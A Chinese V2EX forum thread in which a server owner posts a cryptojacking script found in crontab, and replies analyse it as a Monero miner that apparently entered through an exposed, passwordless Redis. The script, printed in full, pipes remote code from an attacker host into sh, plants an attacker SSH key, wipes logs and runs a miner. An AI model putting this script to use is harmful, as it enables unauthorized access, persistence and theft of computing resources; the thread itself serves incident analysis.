首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
V2EX  ›  Linux

Linux 被黑了,来看看这是什么回事。。。

  •  
  •   dengshuang · 6 天前 · 5533 次点击

    系统 centos7

    今天看到服务器报警 68%的 cpu 被用。我也没干嘛啊。 用 htop 看到如下: 图片

    很浪啊,赶紧 kill -9 杀掉进程,单一下子就有起来了。 灵光一闪,查看 crontab,如图: crontab 用 crontab 里的链接下载了这个 sh:

    #!/bin/bash
    ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep kworkers | grep -v grep | awk '{print $2}' | xargs kill -9
    skill -KILL udevs
    skill -KILL kworkers
    rm -rf /var/lib/apt/lists/*
    apt-get update
    apt-get install wget -y
    apt-get install libcurl4-openssl-dev -y
    apt-get install python-pip -y
    apt-get install ca-certificates -y
    apt-get install redis-tools -y
    apt-get install python gcc -y
    apt-get install python-setuptools python-dev build-essential -y --allow-unauthenticated
    yum -y install epel-release
    yum -y install wget gcc redis git python-pip ca-certificates
    echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/root
    echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    mkdir -p /root/.ssh/
    echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/crontabs/root
    echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/crontabs/root
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys
    chmod 600 /root/.ssh/authorized_keys
    PS3=$(iptables -L | grep 6379 | wc -l)
    if [ $PS3 -eq 0 ];
    then
    yum -y install iptables-services
    iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
    iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
    service iptables save
    /etc/init.d/iptables-persistent save
    fi
    echo "" > /var/log/wtmp
    echo "" > /var/log/secure
    history -c
    if [ ! -f "/tmp/migrations" ];then
    wget https://transfer.sh/SstPD/clay  --no-check-certificate -O /tmp/clay && chmod +x /tmp/clay
    wget https://transfer.sh/q4oJN/nodexx --no-check-certificate -O /tmp/migrations && chmod 777 /tmp/migrations
    curl -sk https://transfer.sh/q4oJN/nodexx -o /tmp/migrations && chmod 777 /tmp/migrations
    fi
    cd /tmp
    PS1=$(ps aux | grep clay | grep -v "grep" | wc -l)
    if [ $PS1 -eq 0 ];
    then
        /tmp/clay &
    fi
    PS2=$(ps aux | grep migrations | grep -v "grep" | wc -l)
    if [ $PS2 -eq 0 ];
    then
        /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
    fi
    if [ $? -ne 0 -a $PS2 -eq 0 ];
    then
    wget https://transfer.sh/pQMdB/glibc-2.14.tar.gz --no-check-certificate -O /tmp/glibc-2.14.tar.gz && tar zxvf /tmp/glibc-2.14.tar.gz -C / && export LD_LIBRARY_PATH=/opt/glibc-2.14/lib:$LD_LIBRARY_PATH && /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B && echo "" > /var/log/wtmp && echo "" > /var/log/secure && history -c 
    fi
    if [ $PS3 -eq 0 ];
    then
    yum -y install iptables-services
    iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
    iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
    service iptables save
    /etc/init.d/iptables-persistent save
    fi
    
    
    

    各位猜猜他是不是要挖矿。 我现在只是把外网用防火墙给卡断了,想仔细研究研究他到底在干嘛

    45 回复  |  直到 2018-04-19 08:38:37 +08:00
        1
    dengshuang   6 天前   ♥ 3
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys
    chmod 600 /root/.ssh/authorized_keys

    这一条很是邪恶啊
        2
    henryshen233   6 天前
    @dengshuang 拽了
        3
    henryshen233   6 天前
    我说一楼
        4
    u5f20u98de   5 天前   ♥ 1
    看样子的确是被拿来挖矿了,看命令是用了一个未授权访问的 redis 漏洞(因为替你把 6379 关上不让别人搞)
        5
    hcymk2   5 天前   ♥ 1
    xmr 门罗币
        6
    doun   5 天前 via Android   ♥ 1
    pool.zer0day.ru:8080 这个好像是挖矿的。找到漏洞了吗怎么被搞的?
        7
    wampyl   5 天前
    被拿来挖矿了
        8
    Felldeadbird   5 天前
    @u5f20u98de 良心黑产脚本?
        9
    murusu   5 天前   ♥ 2
    被人拿来当矿机了
    很奇怪的是你这机子允许 root 帐号远程登录?
        10
    bearqq   5 天前 via Android
    Stratum 字样挖矿无疑
    有可能是 ssh 密码破解搞进来的,别的弱密码也可能,1day 漏洞也可能看你更新不。
        11
    jasonyang9   5 天前   ♥ 2
    ```
    /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
    ```

    还保留了 15%CPU 给你用,良心啊
        12
    hcymk2   5 天前
    echo "" > /var/log/wtmp
    echo "" > /var/log/secure
    history -c
        13
    geagerg   5 天前   ♥ 1
    见过个类似的,看看是不是 redis 开了外网访问但是没设密码或者弱密码或或者配置文件有误未生效
        14
    dengshuang   5 天前   ♥ 1
    @murusu 不是这是内网的电脑,当时通过代理,把 6379 端口 redis 代理出去了。redis 是用 root 运行的。
        15
    dengshuang   5 天前
    @jasonyang9 尴尬,哈哈
        16
    EXE   5 天前   ♥ 1
    前几天服务器刚中了挖门罗币的病毒,而且用的还是 docker 来跑的。。。
        17
    jingdaihuaxia   5 天前
    被挖矿了?
        18
    u5f20u98de   5 天前
    @Felldeadbird 不是良心,是怕被别家黑客工具用了,竞争也很激烈啊。
        19
    4ever911   5 天前
    我前几天配置的 SS 也被黑了用作 ddos,客服发 email 说关停了我的机器,我上去一看,几个小时打了 300G 流量。。。。。 也不知道是如何黑的,后来果断重新弄了一台,关了 root 远程登录,关闭密码登陆。
        20
    nicevar   5 天前
    估计是 ssh 被爆破进入的
        21
    Rootcat   5 天前
    看了这个,我竟然想到的是拿我闲置的服务器来挖门罗币,不知道能挖多少。。。
        22
    lopetver   5 天前
    migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B

    这条命令已经说明是在挖矿了
        23
    kongkongyzt   5 天前
    @dengshuang #1 +1, 刚想回这个, 这条 hhh
        24
    lopetver   5 天前
    @kongkongyzt 求解这条是什么意思
        25
    FindBoyFriend   5 天前
    一项喜欢用 keys 登陆 ssh,就差两步验证了
        26
    f2f2f   5 天前
    @jasonyang9 然而即便留了 15% 很多商家还是会直接把这样的 vps 给 suspend 了 #滑稽
        27
    imaning   5 天前
    @Rootcat 照这么说,我手上有 3 台服务器,都是闲置的,我也该去试试挖矿?
        28
    king2014   5 天前
    @lopetver 直接加入自己的密钥,可以随时登录了,不需要密码
        29
    dengshuang   5 天前
    @lopetver 免密码 登陆
        30
    airycanon   5 天前
    你是不是用 root 启动 redis 了并且对外网是开放的?
        31
    sdzwb   5 天前
    这是服务器被入侵,同时用于挖矿的步骤啊。
    要杜绝还得找服务器漏洞的根源,然后再去堵。
        32
    YMB   5 天前
    前段时间研究过 redis 漏洞,但新版本貌似怎么都不能生效,楼主 redis 版本是多少?
    有可疑 key 之类的一些信息吗,有的话麻烦提供一下大家研究研究
        33
    ZackB0T   5 天前 via Android
    最简单的方式,云墙 设置下 ssh 端口么? ip 或者 IP 段放行。
    挖门罗的
    打算挖的,给你个参考,G620 CentOS 倆核算力 50,如果支持 aes 能快不少。但是 cpu 自己挖电费回不来,矿池一般 0.3 提,这算力基本一年提不出来。
        34
    YumeMichi   5 天前
    让我想起我司一台测试服务器上的 redis 没有设置密码 然后因为版本也不是最新的 就被人利用漏洞种过挖矿程序
        35
    Miy4mori   5 天前
    @Felldeadbird 你怎么理解到良心的,明显怕后来人把自己蹬了啊。
        36
    jeffson   5 天前
    stratum+tcp://pool.zer0day.ru:8080 必然是挖矿啊
        37
    lusi1990   5 天前 via Android
    我也被黑锅,cpu 占用了 100%
        38
    DeWhite   5 天前
    @jasonyang9 我之前查日志菜发现 只被用了 50%,这不算良心
        39
    projectzoo   5 天前
    @dengshuang #1 有点意思,这个。。
        40
    msg7086   5 天前
    无密码全球公开 root 账户运行的 redis,不拿来挖矿难道还留着过年?
        41
    defunct9   5 天前 via iPhone
    挖门罗币种的

    开 ssh,让我上去也挖挖
        42
    winglight2016   5 天前
    一般 VPS 都会禁止挖矿的
        43
    henryshen233   5 天前
    @4ever911 上次我的 Linode 也流量暴涨,后来只开放必要端口就好了
        44
    xiayun   4 天前
    挖矿的,应该是利用 redis 端口漏洞进来的,因为 redis 默认是不用用户密码的
        45
    infra   3 天前
    被偷挖挖门罗币了
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   鸣谢   ·   1850 人在线   最高记录 3541   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.0 · 25ms · UTC 06:41 · PVG 14:41 · LAX 23:41 · JFK 02:41
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1